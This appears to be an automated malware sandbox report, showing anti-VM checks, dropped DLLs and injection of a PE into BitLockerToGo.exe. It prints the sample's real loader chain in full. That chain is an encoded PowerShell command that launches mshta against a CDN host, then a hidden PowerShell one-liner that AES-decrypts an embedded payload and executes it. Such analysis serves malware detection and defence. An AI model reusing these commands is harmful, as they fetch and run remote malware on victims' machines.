              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2459Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1012Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1440Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 579Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5793Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxSharedFolders.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]Jump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxSharedClipboard.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxVMM.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Qt5SqlVBox.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\VBoxSupLib.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dllJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520Thread sleep count: 1440 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep count: 579 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7284Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -11990383647911201s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03051160 GetSystemInfo,11_2_03051160
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: VBoxVMM.dll.5.drBinary or memory string: X2APICPAGE::id.u32ApicIdX2APICPAGE::version.all.u32VersionX2APICPAGE::tpr.u8TprX2APICPAGE::ppr.u8PprX2APICPAGE::ldr.u32LogicalApicIdX2APICPAGE::svr.all.u32SvrX2APICPAGE::isr.u[0].u32RegX2APICPAGE::isr.u[1].u32RegX2APICPAGE::isr.u[2].u32RegX2APICPAGE::isr.u[3].u32RegX2APICPAGE::isr.u[4].u32RegX2APICPAGE::isr.u[5].u32RegX2APICPAGE::isr.u[6].u32RegX2APICPAGE::isr.u[7].u32RegX2APICPAGE::tmr.u[0].u32RegX2APICPAGE::tmr.u[1].u32RegX2APICPAGE::tmr.u[2].u32RegX2APICPAGE::tmr.u[3].u32RegX2APICPAGE::tmr.u[4].u32RegX2APICPAGE::tmr.u[5].u32RegX2APICPAGE::tmr.u[6].u32RegX2APICPAGE::tmr.u[7].u32RegX2APICPAGE::irr.u[0].u32RegX2APICPAGE::irr.u[1].u32RegX2APICPAGE::irr.u[2].u32RegX2APICPAGE::irr.u[3].u32RegX2APICPAGE::irr.u[4].u32RegX2APICPAGE::irr.u[5].u32RegX2APICPAGE::irr.u[6].u32RegX2APICPAGE::irr.u[7].u32RegX2APICPAGE::esr.all.u32ErrorsX2APICPAGE::icr_lo.all.u32IcrLoX2APICPAGE::icr_hi.u32IcrHiX2APICPAGE::lvt_timer.all.u32LvtTimerX2APICPAGE::lvt_thermal.all.u32LvtThermalX2APICPAGE::lvt_perf.all.u32LvtPerfX2APICPAGE::lvt_lint0.all.u32LvtLint0X2APICPAGE::lvt_lint1.all.u32LvtLint1X2APICPAGE::lvt_error.all.u32LvtErrorX2APICPAGE::timer_icr.u32InitialCountX2APICPAGE::timer_ccr.u32CurrentCountX2APICPAGE::timer_dcr.all.u32DivideValueAPIC: Enabling Hyper-V x2APIC compatibility mode
              Source: VBoxVMM.dll.5.drBinary or memory string: APIC: Enabling Hyper-V x2APIC compatibility mode
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareEs
              Source: svchost.exe, 00000004.00000002.2964949813.00000209D2E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: mshta.exe, 00000003.00000003.2366441304.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2369689923.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358841397.0000022F67131000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2964983054.00000209D2E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2966675711.00000209D8659000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: BitLockerToGo.exe, 0000000B.00000002.2079531848.0000000003311000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: mshta.exe, 00000003.00000002.2369326741.0000022F670CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2358601385.0000022F670CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPs
              Source: 0SmartAssem.exe, 00000008.00000002.1998926914.0000022BCA468000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0306A718
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03054610 VirtualProtect ?,00000004,00000100,0000000011_2_03054610
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_0306BA2C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03069160 mov eax, dword ptr fs:[00000030h]11_2_03069160
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_03054610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,11_2_03054610
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0306A718
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306C8D9 SetUnhandledExceptionFilter,11_2_0306C8D9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 11_2_0306ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0306ACFA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: 0SmartAssem.exe PID: 7716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7916, type: MEMORYSTR
              Allocates memory in foreign processes
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and writeJump to behavior
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded mshta "https://bidvertiser.b-cdn.net/smart1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded mshta "https://bidvertiser.b-cdn.net/smart1"Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E35008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3)Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\0SmartAssem.exe "C:\Users\user\AppData\Roaming\0SmartAssem.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\0SmartAssem.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function hbahmnxa($zzzovm){return -split ($zzzovm -replace '..', '0x$& ')};$pecdkn = hbahmnxa('649390cfebe1770baa5146de729123ccd838e758e4276a363f637b3aaf033337ac0657955271e9550f501406601e1a41860e46e19b664ff95794ff1f3d04636bd08f0c38c4b63e80890b016bd8ab0b78879ef113b89a3f38f6f895de87aea8d3b7f0cceb19c1832e835097eccb2c36890967c12beb560476870cfca3b2026770977e5bfc6237ba383ab0c9bc4fee55e653db382e41c9866a6c0222d784911f31ebb65e3730429d060ff2e1fca15d8f85018d75055e5f3d7f26332ee40768ec9bafdc24fc0691d6b57ab81120a83ff0208197b7794eb8e48f081d5265c2ede5be7c897c05abf2349eba71b3759948f6cc4e3d2aa8cb8b87bc3ef6dd53f55e24b1a14b06982580b23e1cdc89a89e5fc9aebcc45162b160bdd6d1dd820e751c213f642e6174ab940a544437cbd4b95f451f49854521b6b5f25dc2958288b9e8ae3e84ec687bf5fd542fd21b03b728755d38b9f795538690a1731ad87a4ff035e0e4df4d5d5926749bcc457636f04db20d58fef916462dcac2915ff336ece4c613138832fb8cb53ec4dda139297818b53354f21f92e9a237cdea5eba27fd7e08abad8bc364c8ac9d4da7ef88987044e30e52f804d80e2dcf76eb0c85804d4469e0f07c9e5ce26611de49ad0bb0333d282354be10f943982430b1169a615e79e3e0c5ec79da387ad53eaf2fd764dbb293f0ef18d616eef99c38992715145d16ca68d09f1d913d460445ad05e1641ee4ac2b1e944f7ff45b6c7c51974decc8b09b1ccbdc8ed7174a14c70f59ea9b96e93e8a336d668ff3c2dc68d75472553892c38d8f32e86361d381e1ee6e6e1bca21fa73fc43dddafced280453e7b5d154f59ef2be213c2656f282eabc6a8d2f17a8b47c539e9817820b02e234fd821466297478cf4c06bf88b97d45dcf3e4c807de237ad7614dcd6332d4de950c177646c50f08062e130279ece8b08c9945a79ecf6c4b88024a24dc840a12e22f404f56b7c13e2f9dc8aadeb49ecc7a67ae9983475129e57afb8d0f9326b22e9b79aaa56db3eec92ea9708998095778497441e15d7795f50116cf78185726e9a7f7a3e40d436d50f77bda8dddbfd8cebb4c758ea3595453635fe911ba9691eb0e2a28529d8c4b9e2d50dd40cbdbc57f9d07995096eb6b48448429c1f014b7bdf9146ec21a79ada827e6590d159548021642354333fc8154696c9e79b4cda3e5d22551f1f2387aaa9ce4464c571969727f845599b1bd312eb356a5e140ec6f91912b1227b9f3a941727413d53c0fe2b26de40bb2b36462055bbf7e8a6b8281cc7ffd4048a1cd97104c3a63ff87ce63106ef7443d01d5fce1fd67a7e73ee2a8f2cd2efed7b4a7796db2328bd317f0349f8b606845cbf4fc0f73d45630ef3466836c0a93133f760481fb4e2f4e46dbff6a7aa0455989567090a3ebb373f3ec52b5ee0558518bc12408677670492bea93021308df47cd62cf99b8e473176b2965284653204ce093a6d8ce56300896793a61754d407eb838a56372881c0664af37f1e9500bbac243013c5f5953abe1cd43347b87c2d6ed6169c7b0d8242de3ed14c3f856f471a13cefe0993ee315d5305cc2ac9054976c9ca5a6');$jqkxh = [system.security.cryptography.aes]::create();$jqkxh.key = hbahmnxa('52615577706262664d6d43476f4f4344');$jqkxh.iv = new-object byte[] 16;$spkoqcak = $jqkxh.createdecryptor();$cwklkdgxo = $spkoqcak.transformfinalblock($pecdkn, 0, $pecdkn.length);$mtmnxpoaf = [system.text.encoding]::utf8.getstring($cwklkdgxo);$spkoqcak.dispose();& $mtmnxpoaf.substring(0,3) $mtmnxpoaf.substring(3)
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function hbahmnxa($zzzovm){return -split ($zzzovm -replace '..', '0x$& ')};$pecdkn = hbahmnxa('649390cfebe1770baa5146de729123ccd838e758e4276a363f637b3aaf033337ac0657955271e9550f501406601e1a41860e46e19b664ff95794ff1f3d04636bd08f0c38c4b63e80890b016bd8ab0b78879ef113b89a3f38f6f895de87aea8d3b7f0cceb19c1832e835097eccb2c36890967c12beb560476870cfca3b2026770977e5bfc6237ba383ab0c9bc4fee55e653db382e41c9866a6c0222d784911f31ebb65e3730429d060ff2e1fca15d8f85018d75055e5f3d7f26332ee40768ec9bafdc24fc0691d6b57ab81120a83ff0208197b7794eb8e48f081d5265c2ede5be7c897c05abf2349eba71b3759948f6cc4e3d2aa8cb8b87bc3ef6dd53f55e24b1a14b06982580b23e1cdc89a89e5fc9aebcc45162b160bdd6d1dd820e751c213f642e6174ab940a544437cbd4b95f451f49854521b6b5f25dc2958288b9e8ae3e84ec687bf5fd542fd21b03b728755d38b9f795538690a1731ad87a4ff035e0e4df4d5d5926749bcc457636f04db20d58fef916462dcac2915ff336ece4c613138832fb8cb53ec4dda139297818b53354f21f92e9a237cdea5eba27fd7e08abad8bc364c8ac9d4da7ef88987044e30e52f804d80e2dcf76eb0c85804d4469e0f07c9e5ce26611de49ad0bb0333d282354be10f943982430b1169a615e79e3e0c5ec79da387ad53eaf2fd764dbb293f0ef18d616eef99c38992715145d16ca68d09f1d913d460445ad05e1641ee4ac2b1e944f7ff45b6c7c51974decc8b09b1ccbdc8ed7174a14c70f59ea9b96e93e8a336d668ff3c2dc68d75472553892c38d8f32e86361d381e1ee6e6e1bca21fa73fc43dddafced280453e7b5d154f59ef2be213c2656f282eabc6a8d2f17a8b47c539e9817820b02e234fd821466297478cf4c06bf88b97d45dcf3e4c807de237ad7614dcd6332d4de950c177646c50f08062e130279ece8b08c9945a79ecf6c4b88024a24dc840a12e22f404f56b7c13e2f9dc8aadeb49ecc7a67ae9983475129e57afb8d0f9326b22e9b79aaa56db3eec92ea9708998095778497441e15d7795f50116cf78185726e9a7f7a3e40d436d50f77bda8dddbfd8cebb4c758ea3595453635fe911ba9691eb0e2a28529d8c4b9e2d50dd40cbdbc57f9d07995096eb6b48448429c1f014b7bdf9146ec21a79ada827e6590d159548021642354333fc8154696c9e79b4cda3e5d22551f1f2387aaa9ce4464c571969727f845599b1bd312eb356a5e140ec6f91912b1227b9f3a941727413d53c0fe2b26de40bb2b36462055bbf7e8a6b8281cc7ffd4048a1cd97104c3a63ff87ce63106ef7443d01d5fce1fd67a7e73ee2a8f2cd2efed7b4a7796db2328bd317f0349f8b606845cbf4fc0f73d45630ef3466836c0a93133f760481fb4e2f4e46dbff6a7aa0455989567090a3ebb373f3ec52b5ee0558518bc12408677670492bea93021308df47cd62cf99b8e473176b2965284653204ce093a6d8ce56300896793a61754d407eb838a56372881c0664af37f1e9500bbac243013c5f5953abe1cd43347b87c2d6ed6169c7b0d8242de3ed14c3f856f471a13cefe0993ee315d5305cc2ac9054976c9ca5a6');$jqkxh = [system.security.cryptography.aes]::create();$jqkxh.key = hbahmnxa('52615577706262664d6d43476f4f4344');$jqkxh.iv = new-object byte[] 16;$spkoqcak = $jqkxh.createdecryptor();$cwklkdgxo = $spkoqcak.transformfinalblock($pecdkn, 0, $pecdkn.length);$mtmnxpoaf = [system.text.encoding]::utf8.getstring($cwklkdgxo);$spkoqcak.dispose();& $mtmnxpoaf.substring(0,3) $mtmnxpoaf.substring(3)Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
